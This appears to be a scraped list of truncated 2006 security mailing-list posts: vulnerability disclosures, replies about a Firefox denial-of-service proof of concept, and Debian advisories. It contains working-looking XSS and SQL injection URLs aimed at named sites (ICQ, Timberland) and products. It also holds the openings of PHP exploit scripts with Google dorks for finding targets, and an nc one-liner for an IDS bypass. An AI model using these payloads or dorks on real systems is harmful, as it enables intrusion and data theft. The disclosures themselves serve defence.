XSS in ICQ.com

Hello, there's a XSS Bug in www.ICQ.com http://www.icq.com/boards/atoz.php?letter=oOOoOooOOOoO%3Cscript%3Ealert%28%27www.SR-Crew.de.tt%27%29%3C/script%3E

SMS "messages.php" SQL injection

=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-BoNy_m Brh-Rootshil-LiNuX_rOOt-SauDiVirUS === Example:- /messages.php?id=[SQL] ===

New <

Muts & I like to announce a new and stable release of "<< BackTrack". This project i a merger out of two well known security penetration testing focused linux live distributions (Whax and Auditor). After hundreds of combined man hours, we can provide you with the finest linux and windows tools on

Timberland Search XSS Vulnerability

There's a vulnerability in Timberland's search engine. The variable 'keywords' in searchHandler/index.jsp is not correctly sanitized. URL: hxxp://www.timberland.com/searchHandler/index.jsp?keywords=[XSS Code] Example: hxxp://www.timberland.com/searchHandler/index.jsp?keywords=alert('test');

Re: Fire fox dos exploit

On Wed, 31 May 2006, Josh Zlatin-Amishav wrote: Can you give us some more details, like versions and platforms affected? I was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable. The word-wrapping of his mail client broke the exploit. If you clean that up by only pu

Re: Fire fox dos exploit

Oke, we've tested this one (see http://www.securityview.org/firefox- marquee-bug.html) because at first we weren't able to let FF crash. The results are on the site, but the bug is well known and it is not more then an annoying thing All the credits goes to n00b for making the PoC, but

VMSA-2006-0001 - VMware ESX Server Cross Site Scripting issue

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- VMware Security Advisory Advisory ID: VMSA-2006-0001 Synopsis: VMware ESX Server Cross Site Scripting issue VMware ESX 2.

Re: phpFoX All Version Login Exploit

Hello. This issue has been solved already and should not work since the whole log in system has been improved. Thank you for sharing

Re: Internet explorer Vulnerbility

I see this work in explorer and my ie 7 beta, both of them crashes. But this does not seem to be easily exploitable. It is a simple stack buffer overun issue. The problem seems to be in inetcomm!CActiveUrlRequest::ParseUrl. now inetcomm seemed to have been gs flagged complied,hence the ove

Re: Fire fox dos exploit

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I was able to use this proof of concept code with the following results: With Firefox 1.0.8 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8) I was able to cause a resource exhaustion with firefox i

Re: Re: Fire fox dos exploit

Yep. I can confirm this for firefox 1.5.0.3 on ubuntu dapper amd64. Filling a bug report

Re: Fire fox dos exploit

Under Apple Mac OS X 10.4.6 (PPC) with Firefox 1.5.0.3 it's reproducible! Cheers, Yannick von Arx Am 31.05.2006 um 16:50 schrieb Josh Zlatin-Amishav: On Tue, 30 May 2006, [EMAIL PROTECTED] wrote: I have found a problem which causes denial of service on fire fox browser Can you give us s

Re: Fire fox dos exploit

I told this guy all ready that it looks like WinXP is the problem. Mac OS X and Debian (Linux) does not hang! With regards, Ronald van den Blink Securityview.org On 31 May, 2006, at 16:50, Josh Zlatin-Amishav wrote: On Tue, 30 May 2006, [EMAIL PROTECTED] wrote: I have found a problem whic

RE: Fire fox dos exploit

Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2 Andy -Original Message- From: Josh Zlatin-Amishav [mailto:[EMAIL PROTECTED] Sent: 31 May 2006 16:50 To: [EMAIL PROTECTED] Cc: bugtraq@securityfocus.com Subject: Re: Fire fox dos exploit On Tue, 30 May 2006, [EM

Re: Fire fox dos exploit

Successfully tested on Firefox 1.5.0.3. I had to kill my firefox.exe process after half a minute of freezing :-) On 30 May 2006 12:03:36 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: I have found a problem which causes denial of service on fire fox browser Creadit:to n00b for finding th

Re: [Info Disclosure] Diesel PHP Job Site Latest Version

As a systems administrator, I must say that your methods are unacceptable. You are violating your customers' trust by doing this without their knowledge. You even made an effort to hide the code that sends the information! This is outright deceit and should not be tolerated by anyone. Regardl

Re: OaBoard 1.0 Remote File inclusion

http://evuln.com/vulns/3/exploit.html look :] -- ___ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze

Re: WBB<--v2.3.4"misc.php" SQL injection Vulnerability

Sorry but i didnt see any SQL injection with your example. I tried all ways and did not get any result or error from SQL server. Could you please show me injection that you found. and vulnerable codes in misc.php Regards, Mustafa Can Bjorn IPEKCI

LifeType <=1.0.4 'articleId' SQL injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: \"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"\r\n\r\n"; /* works regardless of magic_quotes_gpc settings */ if ($argc<3) { echo "Usage: php ".$argv[0].

DotClear <= 1.2.4 'blog_dc_path' (php5) arbitrary remote inclusion

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "dork: \"propulsé par DotClear\" \"fil atom\" \"fil rss\" +commentaires\r\n\r\n"; /* works with PHP5 register_globals=On, allow_url_fopen=On */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path ft

Re: New Snort Bypass - Patch - Bypass of Patch

[Sorry to reply to my own post, but...] M. Dodge Mumford said: > Sigint Consulting said: > > perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc > > 192.168.1.3 80 > > > > No alert is generated from the string above. > > [...] > > > We are not sure how much this may buy an attacker a

[SECURITY] [DSA 1089-1] New freeradius packages fix arbitrary code execution

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1089-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 3rd, 2006

[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability

[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability - Software: dotWidget CMS Version: <=1.0.6 Type: Remote File Include Vulnerability Date: June, 2nd 2006 Vendor: dotWidget P

phpBB2 (template.php) Remote File Inclusion

*Title: *phpBB2 Remote File Include * * *Credit: *Canberx * * *Thanx: *Forewer-Partizan * * *Mail: [EMAIL PROTECTED]www.canberx.tk * * *Google Dork: *Powered by phpBB © 2001, 2002 phpBB Group * * *Exploit:

LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

# Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability # Author : ajann #Vulnerability; $$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT $$$ Example: http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0

Re: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit

This is not vulnerable,PHP-Nuke having a special in their files and when includes mainfile.php it overwrites the global variables and it caused to make an arbitrary file inclusion. But in MyBloggie there is no common vulnerability like it.I checked all files and all versions did not see any vul

Blackhat USA 2006 - Review , remarks and proposal agenda

the Blackhat agenda for USA 2006 session had just been published : URL The first remark is that this year, Blackhat USA, will be an incredible briefing ! There will be several Zero day announcements. For example: Brendan O'Conn

[SECURITY] [DSA 1088-1] New centericq packages fix arbitrary code execution

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1088-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 3rd, 2006

Critical SQL Injection in CoolForum

Type: SQL Injection Risk: Critical Product: CoolForum <= 0.8.3 beta Vulnerability * // File: editpost.php // Line 38 // if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']); else $post = 0; -- // Line 77 // $canedit = getrighted

[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution

___ ___ \_ _/\_ ___ \ / | \\_ \ |__)_ /\ \//~\/ | \ |\\ \___\Y/|\ /___ / \__ /\___|_ /\___ / \/ \/ \/ \/

[SECURITY] [DSA 1087-1] New PostgreSQL packages fix encoding vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1087-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 3rd, 2006

Pixelpost <= 1-5rc1-2 multiple vulnerabilities

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"\r\n\r\n"; /* works with: magic_quotes_gpc=Off */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path your_ip cmd OPTIONS\r\n"; echo